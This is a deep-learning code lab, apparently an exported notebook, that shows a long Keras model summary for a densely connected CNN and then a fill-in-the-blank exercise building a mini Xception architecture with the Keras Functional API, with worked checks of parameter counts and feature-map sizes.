batch_normalization_247 (BatchN (None, 56, 56, 32) 128 conv2d_247[0][0]
__________________________________________________________________________________________________
re_lu_247 (ReLU) (None, 56, 56, 32) 0 batch_normalization_247[0][0]
__________________________________________________________________________________________________
concatenate_119 (Concatenate) (None, 56, 56, 160) 0 concatenate_118[0][0]
re_lu_247[0][0]
__________________________________________________________________________________________________
conv2d_248 (Conv2D) (None, 56, 56, 128) 20608 concatenate_119[0][0]
__________________________________________________________________________________________________
batch_normalization_248 (BatchN (None, 56, 56, 128) 512 conv2d_248[0][0]
__________________________________________________________________________________________________
re_lu_248 (ReLU) (None, 56, 56, 128) 0 batch_normalization_248[0][0]
__________________________________________________________________________________________________
conv2d_249 (Conv2D) (None, 56, 56, 32) 36896 re_lu_248[0][0]
__________________________________________________________________________________________________
batch_normalization_249 (BatchN (None, 56, 56, 32) 128 conv2d_249[0][0]
__________________________________________________________________________________________________
re_lu_249 (ReLU) (None, 56, 56, 32) 0 batch_normalization_249[0][0]
__________________________________________________________________________________________________
concatenate_120 (Concatenate) (None, 56, 56, 192) 0 concatenate_119[0][0]
re_lu_249[0][0]
__________________________________________________________________________________________________
conv2d_250 (Conv2D) (None, 56, 56, 128) 24704 concatenate_120[0][0]
__________________________________________________________________________________________________
batch_normalization_250 (BatchN (None, 56, 56, 128) 512 conv2d_250[0][0]
__________________________________________________________________________________________________
re_lu_250 (ReLU) (None, 56, 56, 128) 0 batch_normalization_250[0][0]
__________________________________________________________________________________________________
conv2d_251 (Conv2D) (None, 56, 56, 32) 36896 re_lu_250[0][0]
__________________________________________________________________________________________________
batch_normalization_251 (BatchN (None, 56, 56, 32) 128 conv2d_251[0][0]
__________________________________________________________________________________________________
re_lu_251 (ReLU) (None, 56, 56, 32) 0 batch_normalization_251[0][0]
__________________________________________________________________________________________________
concatenate_121 (Concatenate) (None, 56, 56, 224) 0 concatenate_120[0][0]
re_lu_251[0][0]
__________________________________________________________________________________________________
conv2d_252 (Conv2D) (None, 56, 56, 128) 28800 concatenate_121[0][0]
__________________________________________________________________________________________________
batch_normalization_252 (BatchN (None, 56, 56, 128) 512 conv2d_252[0][0]
__________________________________________________________________________________________________
re_lu_252 (ReLU) (None, 56, 56, 128) 0 batch_normalization_252[0][0]
__________________________________________________________________________________________________
conv2d_253 (Conv2D) (None, 56, 56, 32) 36896 re_lu_252[0][0]
__________________________________________________________________________________________________
batch_normalization_253 (BatchN (None, 56, 56, 32) 128 conv2d_253[0][0]
__________________________________________________________________________________________________
re_lu_253 (ReLU) (None, 56, 56, 32) 0 batch_normalization_253[0][0]
__________________________________________________________________________________________________
concatenate_122 (Concatenate) (None, 56, 56, 256) 0 concatenate_121[0][0]
re_lu_253[0][0]
__________________________________________________________________________________________________
conv2d_254 (Conv2D) (None, 56, 56, 128) 32896 concatenate_122[0][0]
__________________________________________________________________________________________________
batch_normalization_254 (BatchN (None, 56, 56, 128) 512 conv2d_254[0][0]
__________________________________________________________________________________________________
re_lu_254 (ReLU) (None, 56, 56, 128) 0 batch_normalization_254[0][0]
REMOVED for BREVITY ...
__________________________________________________________________________________________________
average_pooling2d_9 (AveragePoo (None, 7, 7, 512) 0 re_lu_328[0][0]
__________________________________________________________________________________________________
conv2d_329 (Conv2D) (None, 7, 7, 128) 65664 average_pooling2d_9[0][0]
__________________________________________________________________________________________________
batch_normalization_329 (BatchN (None, 7, 7, 128) 512 conv2d_329[0][0]
__________________________________________________________________________________________________
re_lu_329 (ReLU) (None, 7, 7, 128) 0 batch_normalization_329[0][0]
__________________________________________________________________________________________________
conv2d_330 (Conv2D) (None, 7, 7, 32) 36896 re_lu_329[0][0]
__________________________________________________________________________________________________
batch_normalization_330 (BatchN (None, 7, 7, 32) 128 conv2d_330[0][0]
__________________________________________________________________________________________________
re_lu_330 (ReLU) (None, 7, 7, 32) 0 batch_normalization_330[0][0]
__________________________________________________________________________________________________
concatenate_159 (Concatenate) (None, 7, 7, 544) 0 average_pooling2d_9[0][0]
re_lu_330[0][0]
__________________________________________________________________________________________________
conv2d_331 (Conv2D) (None, 7, 7, 128) 69760 concatenate_159[0][0]
__________________________________________________________________________________________________
batch_normalization_331 (BatchN (None, 7, 7, 128) 512 conv2d_331[0][0]
__________________________________________________________________________________________________
re_lu_331 (ReLU) (None, 7, 7, 128) 0 batch_normalization_331[0][0]
__________________________________________________________________________________________________
conv2d_332 (Conv2D) (None, 7, 7, 32) 36896 re_lu_331[0][0]
__________________________________________________________________________________________________
batch_normalization_332 (BatchN (None, 7, 7, 32) 128 conv2d_332[0][0]
__________________________________________________________________________________________________
re_lu_332 (ReLU) (None, 7, 7, 32) 0 batch_normalization_332[0][0]
__________________________________________________________________________________________________
concatenate_160 (Concatenate) (None, 7, 7, 576) 0 concatenate_159[0][0]
re_lu_332[0][0]
__________________________________________________________________________________________________
conv2d_333 (Conv2D) (None, 7, 7, 128) 73856 concatenate_160[0][0]
__________________________________________________________________________________________________
batch_normalization_333 (BatchN (None, 7, 7, 128) 512 conv2d_333[0][0]
__________________________________________________________________________________________________
re_lu_333 (ReLU) (None, 7, 7, 128) 0 batch_normalization_333[0][0]
__________________________________________________________________________________________________
conv2d_334 (Conv2D) (None, 7, 7, 32) 36896 re_lu_333[0][0]
__________________________________________________________________________________________________
batch_normalization_334 (BatchN (None, 7, 7, 32) 128 conv2d_334[0][0]
__________________________________________________________________________________________________
re_lu_334 (ReLU) (None, 7, 7, 32) 0 batch_normalization_334[0][0]
__________________________________________________________________________________________________
concatenate_161 (Concatenate) (None, 7, 7, 608) 0 concatenate_160[0][0]
re_lu_334[0][0]
__________________________________________________________________________________________________
conv2d_335 (Conv2D) (None, 7, 7, 128) 77952 concatenate_161[0][0]
__________________________________________________________________________________________________
batch_normalization_335 (BatchN (None, 7, 7, 128) 512 conv2d_335[0][0]
__________________________________________________________________________________________________
re_lu_335 (ReLU) (None, 7, 7, 128) 0 batch_normalization_335[0][0]
__________________________________________________________________________________________________
conv2d_336 (Conv2D) (None, 7, 7, 32) 36896 re_lu_335[0][0]
__________________________________________________________________________________________________
batch_normalization_336 (BatchN (None, 7, 7, 32) 128 conv2d_336[0][0]
__________________________________________________________________________________________________
re_lu_336 (ReLU) (None, 7, 7, 32) 0 batch_normalization_336[0][0]
__________________________________________________________________________________________________
concatenate_162 (Concatenate) (None, 7, 7, 640) 0 concatenate_161[0][0]
re_lu_336[0][0]
__________________________________________________________________________________________________
conv2d_337 (Conv2D) (None, 7, 7, 128) 82048 concatenate_162[0][0]
__________________________________________________________________________________________________
batch_normalization_337 (BatchN (None, 7, 7, 128) 512 conv2d_337[0][0]
__________________________________________________________________________________________________
re_lu_337 (ReLU) (None, 7, 7, 128) 0 batch_normalization_337[0][0]
__________________________________________________________________________________________________
conv2d_338 (Conv2D) (None, 7, 7, 32) 36896 re_lu_337[0][0]
__________________________________________________________________________________________________
batch_normalization_338 (BatchN (None, 7, 7, 32) 128 conv2d_338[0][0]
__________________________________________________________________________________________________
re_lu_338 (ReLU) (None, 7, 7, 32) 0 batch_normalization_338[0][0]
__________________________________________________________________________________________________
concatenate_163 (Concatenate) (None, 7, 7, 672) 0 concatenate_162[0][0]
re_lu_338[0][0]
__________________________________________________________________________________________________
conv2d_339 (Conv2D) (None, 7, 7, 128) 86144 concatenate_163[0][0]
__________________________________________________________________________________________________
batch_normalization_339 (BatchN (None, 7, 7, 128) 512 conv2d_339[0][0]
__________________________________________________________________________________________________
re_lu_339 (ReLU) (None, 7, 7, 128) 0 batch_normalization_339[0][0]
__________________________________________________________________________________________________
conv2d_340 (Conv2D) (None, 7, 7, 32) 36896 re_lu_339[0][0]
__________________________________________________________________________________________________
batch_normalization_340 (BatchN (None, 7, 7, 32) 128 conv2d_340[0][0]
__________________________________________________________________________________________________
re_lu_340 (ReLU) (None, 7, 7, 32) 0 batch_normalization_340[0][0]
__________________________________________________________________________________________________
concatenate_164 (Concatenate) (None, 7, 7, 704) 0 concatenate_163[0][0]
re_lu_340[0][0]
__________________________________________________________________________________________________
conv2d_341 (Conv2D) (None, 7, 7, 128) 90240 concatenate_164[0][0]
__________________________________________________________________________________________________
batch_normalization_341 (BatchN (None, 7, 7, 128) 512 conv2d_341[0][0]
__________________________________________________________________________________________________
re_lu_341 (ReLU) (None, 7, 7, 128) 0 batch_normalization_341[0][0]
__________________________________________________________________________________________________
conv2d_342 (Conv2D) (None, 7, 7, 32) 36896 re_lu_341[0][0]
__________________________________________________________________________________________________
batch_normalization_342 (BatchN (None, 7, 7, 32) 128 conv2d_342[0][0]
__________________________________________________________________________________________________
re_lu_342 (ReLU) (None, 7, 7, 32) 0 batch_normalization_342[0][0]
__________________________________________________________________________________________________
concatenate_165 (Concatenate) (None, 7, 7, 736) 0 concatenate_164[0][0]
re_lu_342[0][0]
__________________________________________________________________________________________________
conv2d_343 (Conv2D) (None, 7, 7, 128) 94336 concatenate_165[0][0]
__________________________________________________________________________________________________
batch_normalization_343 (BatchN (None, 7, 7, 128) 512 conv2d_343[0][0]
__________________________________________________________________________________________________
re_lu_343 (ReLU) (None, 7, 7, 128) 0 batch_normalization_343[0][0]
__________________________________________________________________________________________________
conv2d_344 (Conv2D) (None, 7, 7, 32) 36896 re_lu_343[0][0]
__________________________________________________________________________________________________
batch_normalization_344 (BatchN (None, 7, 7, 32) 128 conv2d_344[0][0]
__________________________________________________________________________________________________
re_lu_344 (ReLU) (None, 7, 7, 32) 0 batch_normalization_344[0][0]
__________________________________________________________________________________________________
concatenate_166 (Concatenate) (None, 7, 7, 768) 0 concatenate_165[0][0]
re_lu_344[0][0]
__________________________________________________________________________________________________
conv2d_345 (Conv2D) (None, 7, 7, 128) 98432 concatenate_166[0][0]
__________________________________________________________________________________________________
batch_normalization_345 (BatchN (None, 7, 7, 128) 512 conv2d_345[0][0]
__________________________________________________________________________________________________
re_lu_345 (ReLU) (None, 7, 7, 128) 0 batch_normalization_345[0][0]
__________________________________________________________________________________________________
conv2d_346 (Conv2D) (None, 7, 7, 32) 36896 re_lu_345[0][0]
__________________________________________________________________________________________________
batch_normalization_346 (BatchN (None, 7, 7, 32) 128 conv2d_346[0][0]
__________________________________________________________________________________________________
re_lu_346 (ReLU) (None, 7, 7, 32) 0 batch_normalization_346[0][0]
__________________________________________________________________________________________________
concatenate_167 (Concatenate) (None, 7, 7, 800) 0 concatenate_166[0][0]
re_lu_346[0][0]
__________________________________________________________________________________________________
conv2d_347 (Conv2D) (None, 7, 7, 128) 102528 concatenate_167[0][0]
__________________________________________________________________________________________________
batch_normalization_347 (BatchN (None, 7, 7, 128) 512 conv2d_347[0][0]
__________________________________________________________________________________________________
re_lu_347 (ReLU) (None, 7, 7, 128) 0 batch_normalization_347[0][0]
__________________________________________________________________________________________________
conv2d_348 (Conv2D) (None, 7, 7, 32) 36896 re_lu_347[0][0]
__________________________________________________________________________________________________
batch_normalization_348 (BatchN (None, 7, 7, 32) 128 conv2d_348[0][0]
__________________________________________________________________________________________________
re_lu_348 (ReLU) (None, 7, 7, 32) 0 batch_normalization_348[0][0]
__________________________________________________________________________________________________
concatenate_168 (Concatenate) (None, 7, 7, 832) 0 concatenate_167[0][0]
re_lu_348[0][0]
__________________________________________________________________________________________________
conv2d_349 (Conv2D) (None, 7, 7, 128) 106624 concatenate_168[0][0]
__________________________________________________________________________________________________
batch_normalization_349 (BatchN (None, 7, 7, 128) 512 conv2d_349[0][0]
__________________________________________________________________________________________________
re_lu_349 (ReLU) (None, 7, 7, 128) 0 batch_normalization_349[0][0]
__________________________________________________________________________________________________
conv2d_350 (Conv2D) (None, 7, 7, 32) 36896 re_lu_349[0][0]
__________________________________________________________________________________________________
batch_normalization_350 (BatchN (None, 7, 7, 32) 128 conv2d_350[0][0]
__________________________________________________________________________________________________
re_lu_350 (ReLU) (None, 7, 7, 32) 0 batch_normalization_350[0][0]
__________________________________________________________________________________________________
concatenate_169 (Concatenate) (None, 7, 7, 864) 0 concatenate_168[0][0]
re_lu_350[0][0]
__________________________________________________________________________________________________
conv2d_351 (Conv2D) (None, 7, 7, 128) 110720 concatenate_169[0][0]
__________________________________________________________________________________________________
batch_normalization_351 (BatchN (None, 7, 7, 128) 512 conv2d_351[0][0]
__________________________________________________________________________________________________
re_lu_351 (ReLU) (None, 7, 7, 128) 0 batch_normalization_351[0][0]
__________________________________________________________________________________________________
conv2d_352 (Conv2D) (None, 7, 7, 32) 36896 re_lu_351[0][0]
__________________________________________________________________________________________________
batch_normalization_352 (BatchN (None, 7, 7, 32) 128 conv2d_352[0][0]
__________________________________________________________________________________________________
re_lu_352 (ReLU) (None, 7, 7, 32) 0 batch_normalization_352[0][0]
__________________________________________________________________________________________________
concatenate_170 (Concatenate) (None, 7, 7, 896) 0 concatenate_169[0][0]
re_lu_352[0][0]
__________________________________________________________________________________________________
conv2d_353 (Conv2D) (None, 7, 7, 128) 114816 concatenate_170[0][0]
__________________________________________________________________________________________________
batch_normalization_353 (BatchN (None, 7, 7, 128) 512 conv2d_353[0][0]
__________________________________________________________________________________________________
re_lu_353 (ReLU) (None, 7, 7, 128) 0 batch_normalization_353[0][0]
__________________________________________________________________________________________________
conv2d_354 (Conv2D) (None, 7, 7, 32) 36896 re_lu_353[0][0]
__________________________________________________________________________________________________
batch_normalization_354 (BatchN (None, 7, 7, 32) 128 conv2d_354[0][0]
__________________________________________________________________________________________________
re_lu_354 (ReLU) (None, 7, 7, 32) 0 batch_normalization_354[0][0]
__________________________________________________________________________________________________
concatenate_171 (Concatenate) (None, 7, 7, 928) 0 concatenate_170[0][0]
re_lu_354[0][0]
__________________________________________________________________________________________________
conv2d_355 (Conv2D) (None, 7, 7, 128) 118912 concatenate_171[0][0]
__________________________________________________________________________________________________
batch_normalization_355 (BatchN (None, 7, 7, 128) 512 conv2d_355[0][0]
__________________________________________________________________________________________________
re_lu_355 (ReLU) (None, 7, 7, 128) 0 batch_normalization_355[0][0]
__________________________________________________________________________________________________
conv2d_356 (Conv2D) (None, 7, 7, 32) 36896 re_lu_355[0][0]
__________________________________________________________________________________________________
batch_normalization_356 (BatchN (None, 7, 7, 32) 128 conv2d_356[0][0]
__________________________________________________________________________________________________
re_lu_356 (ReLU) (None, 7, 7, 32) 0 batch_normalization_356[0][0]
__________________________________________________________________________________________________
concatenate_172 (Concatenate) (None, 7, 7, 960) 0 concatenate_171[0][0]
re_lu_356[0][0]
__________________________________________________________________________________________________
conv2d_357 (Conv2D) (None, 7, 7, 128) 123008 concatenate_172[0][0]
__________________________________________________________________________________________________
batch_normalization_357 (BatchN (None, 7, 7, 128) 512 conv2d_357[0][0]
__________________________________________________________________________________________________
re_lu_357 (ReLU) (None, 7, 7, 128) 0 batch_normalization_357[0][0]
__________________________________________________________________________________________________
conv2d_358 (Conv2D) (None, 7, 7, 32) 36896 re_lu_357[0][0]
__________________________________________________________________________________________________
batch_normalization_358 (BatchN (None, 7, 7, 32) 128 conv2d_358[0][0]
__________________________________________________________________________________________________
re_lu_358 (ReLU) (None, 7, 7, 32) 0 batch_normalization_358[0][0]
__________________________________________________________________________________________________
concatenate_173 (Concatenate) (None, 7, 7, 992) 0 concatenate_172[0][0]
re_lu_358[0][0]
__________________________________________________________________________________________________
conv2d_359 (Conv2D) (None, 7, 7, 128) 127104 concatenate_173[0][0]
__________________________________________________________________________________________________
batch_normalization_359 (BatchN (None, 7, 7, 128) 512 conv2d_359[0][0]
__________________________________________________________________________________________________
re_lu_359 (ReLU) (None, 7, 7, 128) 0 batch_normalization_359[0][0]
__________________________________________________________________________________________________
conv2d_360 (Conv2D) (None, 7, 7, 32) 36896 re_lu_359[0][0]
__________________________________________________________________________________________________
batch_normalization_360 (BatchN (None, 7, 7, 32) 128 conv2d_360[0][0]
__________________________________________________________________________________________________
re_lu_360 (ReLU) (None, 7, 7, 32) 0 batch_normalization_360[0][0]
__________________________________________________________________________________________________
concatenate_174 (Concatenate) (None, 7, 7, 1024) 0 concatenate_173[0][0]
re_lu_360[0][0]
__________________________________________________________________________________________________
global_average_pooling2d_3 (Glo (None, 1024) 0 concatenate_174[0][0]
__________________________________________________________________________________________________
dense_3 (Dense) (None, 1000) 1025000 global_average_pooling2d_3[0][0]
==================================================================================================
Total params: 7,946,408
Trainable params: 7,925,928
Non-trainable params: 20,480
__________________________________________________________________________________________________
```
```
model.summary()
```
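The parameter counts in a summary like the one above can be checked by hand. As a sketch (the helper names here are mine, not Keras API), the count for a convolution is kernel height × kernel width × input channels × filters, plus one bias per filter; for a dense layer it is inputs × outputs plus biases:

```python
# Parameter-count helpers for the layers in the summary above.
# These are the standard formulas, not Keras API calls.

def conv2d_params(kh, kw, c_in, c_out):
    """Weights (kh*kw*c_in per output filter) plus one bias per filter."""
    return kh * kw * c_in * c_out + c_out

def dense_params(n_in, n_out):
    """Fully connected layer: weight matrix plus biases."""
    return n_in * n_out + n_out

# conv2d_359: 1x1 convolution on 992 input channels, 128 filters
print(conv2d_params(1, 1, 992, 128))   # 127104
# conv2d_360: 3x3 convolution on 128 input channels, 32 filters
print(conv2d_params(3, 3, 128, 32))    # 36896
# dense_3: 1024 inputs -> 1000 classes
print(dense_params(1024, 1000))        # 1025000
```

All three values match the corresponding rows of the summary, and the BatchNormalization rows (4 parameters per channel, half of them non-trainable) account for the rest.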
## Xception Architecture using Functional API
Let's lay out a CNN using the Xception architecture pattern.
We will use these approaches:
1. Decompose the network into a stem, entry, middle and exit module.
2. The stem does the initial sequential convolutional layers for the input.
3. The entry flow does the coarse filter learning.
4. The middle flow does the detail filter learning.
5. The exit flow does the classification.
We won't build a full Xception, just a mini-example to practice the layout.
You will need to:
1. Use a strided convolution in the stem group.
2. Set the number of residual blocks in the residual groups in the middle flow.
3. Use global averaging in the classifier.
4. Set the input to the projection link in the residual blocks in the entry flow.
5. Remember the input to the residual blocks in the middle flow.
```
from keras import layers, Input, Model

def entryFlow(inputs):
    """ Create the entry flow section
        inputs : input tensor to neural network
    """

    def stem(inputs):
        """ Create the stem entry into the neural network
            inputs : input tensor to neural network
        """
        # The stem uses two 3x3 convolutions:
        # the first one downsamples and the second one doubles the number of filters.

        # First convolution
        x = layers.Conv2D(32, (3, 3), strides=(2, 2))(inputs)
        x = layers.BatchNormalization()(x)
        x = layers.ReLU()(x)

        # Second convolution, double the number of filters (no downsampling)
        # HINT: when stride > 1 you are downsampling (also known as a strided convolution)
        x = layers.Conv2D(??, (3, 3), strides=??)(x)
        x = layers.BatchNormalization()(x)
        x = layers.ReLU()(x)
        return x

    # Create the stem to the neural network
    x = stem(inputs)

    # Create three residual blocks
    for nb_filters in [128, 256, 728]:
        x = residual_block_entry(x, nb_filters)

    return x

def middleFlow(x):
    """ Create the middle flow section
        x : input tensor into section
    """
    # Create 8 residual blocks, each with 728 filters
    for _ in range(8):
        x = residual_block_middle(x, ??)
    return x

def exitFlow(x):
    """ Create the exit flow section
        x : input tensor into section
    """

    def classifier(x):
        """ The output classifier
            x : input tensor
        """
        # Global Average Pooling will flatten the 10x10 feature maps into
        # 1D feature maps
        x = layers.??()(x)

        # Fully connected output layer (classification)
        x = layers.Dense(1000, activation='softmax')(x)
        return x

    shortcut = x

    # First Depthwise Separable Convolution
    x = layers.SeparableConv2D(728, (3, 3), padding='same')(x)
    x = layers.BatchNormalization()(x)
    x = layers.ReLU()(x)

    # Second Depthwise Separable Convolution
    x = layers.SeparableConv2D(1024, (3, 3), padding='same')(x)
    x = layers.BatchNormalization()(x)
    x = layers.ReLU()(x)

    # Create pooled feature maps, reduce size by 75%
    x = layers.MaxPooling2D((3, 3), strides=(2, 2), padding='same')(x)

    # Add strided convolution to identity link to double the number of filters
    # to match the output of the residual block for the add operation
    shortcut = layers.Conv2D(1024, (1, 1), strides=(2, 2),
                             padding='same')(shortcut)
    shortcut = layers.BatchNormalization()(shortcut)

    x = layers.add([x, shortcut])

    # Third Depthwise Separable Convolution
    x = layers.SeparableConv2D(1556, (3, 3), padding='same')(x)
    x = layers.BatchNormalization()(x)
    x = layers.ReLU()(x)

    # Fourth Depthwise Separable Convolution
    x = layers.SeparableConv2D(2048, (3, 3), padding='same')(x)
    x = layers.BatchNormalization()(x)
    x = layers.ReLU()(x)

    # Create classifier section
    x = classifier(x)

    return x

def residual_block_entry(x, nb_filters):
    """ Create a residual block using Depthwise Separable Convolutions
        x         : input into residual block
        nb_filters: number of filters
    """
    shortcut = x

    # First Depthwise Separable Convolution
    x = layers.SeparableConv2D(nb_filters, (3, 3), padding='same')(x)
    x = layers.BatchNormalization()(x)
    x = layers.ReLU()(x)

    # Second Depthwise Separable Convolution
    x = layers.SeparableConv2D(nb_filters, (3, 3), padding='same')(x)
    x = layers.BatchNormalization()(x)
    x = layers.ReLU()(x)

    # Create pooled feature maps, reduce size by 75%
    x = layers.MaxPooling2D((3, 3), strides=(2, 2), padding='same')(x)

    # Add strided convolution to identity link to double the number of filters
    # to match the output of the residual block for the add operation
    # HINT: this is the identity branch, so what should be the input?
    shortcut = layers.Conv2D(nb_filters, (1, 1), strides=(2, 2),
                             padding='same')(??)
    shortcut = layers.BatchNormalization()(shortcut)

    x = layers.add([x, shortcut])
    return x

def residual_block_middle(x, nb_filters):
    """ Create a residual block using Depthwise Separable Convolutions
        x         : input into residual block
        nb_filters: number of filters
    """
    # Remember to save the input for the identity link
    # HINT: it's in the params!
    shortcut = ??

    # First Depthwise Separable Convolution
    x = layers.SeparableConv2D(nb_filters, (3, 3), padding='same')(x)
    x = layers.BatchNormalization()(x)
    x = layers.ReLU()(x)

    # Second Depthwise Separable Convolution
    x = layers.SeparableConv2D(nb_filters, (3, 3), padding='same')(x)
    x = layers.BatchNormalization()(x)
    x = layers.ReLU()(x)

    # Third Depthwise Separable Convolution
    x = layers.SeparableConv2D(nb_filters, (3, 3), padding='same')(x)
    x = layers.BatchNormalization()(x)
    x = layers.ReLU()(x)

    x = layers.add([x, shortcut])
    return x

inputs = Input(shape=(299, 299, 3))

# Create the entry section
x = entryFlow(inputs)

# Create the middle section
x = middleFlow(x)

# Create the exit section
outputs = exitFlow(x)

model = Model(inputs, outputs)
```
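Before filling in the blanks, it may help to see why the lab reaches for `SeparableConv2D` rather than plain `Conv2D`. A depthwise separable convolution factors a convolution into a per-channel spatial step and a 1x1 channel-mixing step, which cuts parameters sharply. A back-of-the-envelope comparison at the middle-flow width (plain Python; the formulas follow Keras's convention of a bias on the pointwise step only):

```python
# Parameter comparison for one 3x3 layer at the middle-flow
# width (728 -> 728 channels).

kh, kw, c_in, c_out = 3, 3, 728, 728

# Standard convolution: every filter spans all input channels
standard = kh * kw * c_in * c_out + c_out

# Separable: a per-channel spatial (depthwise) step, then a 1x1
# (pointwise) step that mixes channels
separable = kh * kw * c_in + c_in * c_out + c_out

print(standard)              # 4770584
print(separable)             # 537264
print(standard / separable)  # roughly 8.9x fewer parameters
```

This factorization is what keeps the eight middle-flow blocks affordable at 728 filters each.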
### Verify the model architecture using the summary method
The end of the summary output should look like this:
```
global_average_pooling2d_1 (Glo (None, 2048) 0 re_lu_37[0][0]
__________________________________________________________________________________________________
dense_1 (Dense) (None, 1000) 2049000 global_average_pooling2d_1[0][0]
==================================================================================================
Total params: 22,981,736
Trainable params: 22,927,232
Non-trainable params: 54,504
```
```
model.summary()
```
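As a sanity check on the comment in `classifier` about 10x10 feature maps, the spatial size can be traced by hand from the 299x299 input, assuming the stem blanks are filled so that the second stem convolution is unstrided. An unpadded ('valid') convolution gives `(n - k) // s + 1`; a stride-2 layer with 'same' padding gives `ceil(n / 2)`:

```python
import math

def valid_conv(n, k=3, s=1):
    """Output size of an unpadded ('valid') convolution."""
    return (n - k) // s + 1

def same_stride2(n):
    """Output size of a stride-2 pooling/conv with 'same' padding."""
    return math.ceil(n / 2)

n = 299
n = valid_conv(n, s=2)    # stem conv 1, strided  -> 149
n = valid_conv(n, s=1)    # stem conv 2           -> 147
for _ in range(3):        # entry-flow max pooling
    n = same_stride2(n)   # 74, 37, 19
n = same_stride2(n)       # exit-flow max pooling -> 10
print(n)
```

The 19x19 maps entering the exit flow are pooled to 10x10, which global average pooling then collapses into the 2048-long vector fed to the dense layer.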
## End of Code Lab